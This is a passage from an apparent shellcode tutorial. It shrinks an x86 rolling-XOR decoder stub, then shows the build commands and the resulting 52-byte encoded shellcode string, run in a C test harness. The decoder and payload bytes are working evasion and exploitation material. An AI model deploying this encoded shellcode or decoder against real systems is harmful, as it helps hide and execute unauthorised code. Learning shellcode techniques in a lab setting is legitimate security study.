Although 56 bytes isn’t large, we still want to try to free even more bytes, right? A small amount of bytes was optimized using these instructions for the decoder function. It doesn’t clears the EBX and EDX register.
New instructions
decoder:
pop esi ; Being called by decoder, last pushed value on stack, put in ESI
xor ecx, ecx ; Clear for counting loop
mov cl, len ; Put length of EncodedShellcode into CL for count loopOld instructions
decoder:
pop esi ; Being called by decoder, last pushed value on stack, put in ESI
; Clear registers for usage
xor ecx, ecx ; Clear for counting loop
xor ebx, ecx
xor edx, ecx
mov cl, len ; Put length of EncodedShellcode into CL for count loopRecompile and run again
After compilation, a total of 52 bytes is being shown, 4 bytes less than before.
$ ../compile_asm.sh rolling-xor-decoder-opt
[+] Assembling with Nasm ...
[+] Linking ...
[+] Done!
$ ../convert_bin_sc.sh rolling-xor-decoder-opt
"\xeb\x13\x5e\x31\xc9\xb1\x1a\x8a\x1e\x8a\x56\x01\x30\xd3\x88\x1e\x46\xe2\xf4\xeb\x05\xe8\xe8\xff\xff\xff\xfb\xca\x0a\x5a\x32\x1d\x32\x41\x29\x41\x6e\x0c\x65\x0b\x82\x61\x31\xb8\x5a\x09\x80\x61\xd1\xda\x17\x97"
$ cp ../sc_template_c.c rolling-xor-decoder-opt-c.c
$ vim rolling-xor-decoder-opt-c.c
$ ../compile_c.sh rolling-xor-decoder-opt-c
[+] Compiling ...
[+] Done!
$ ./rolling-xor-decoder-opt-c
Shellcode Length: 52
$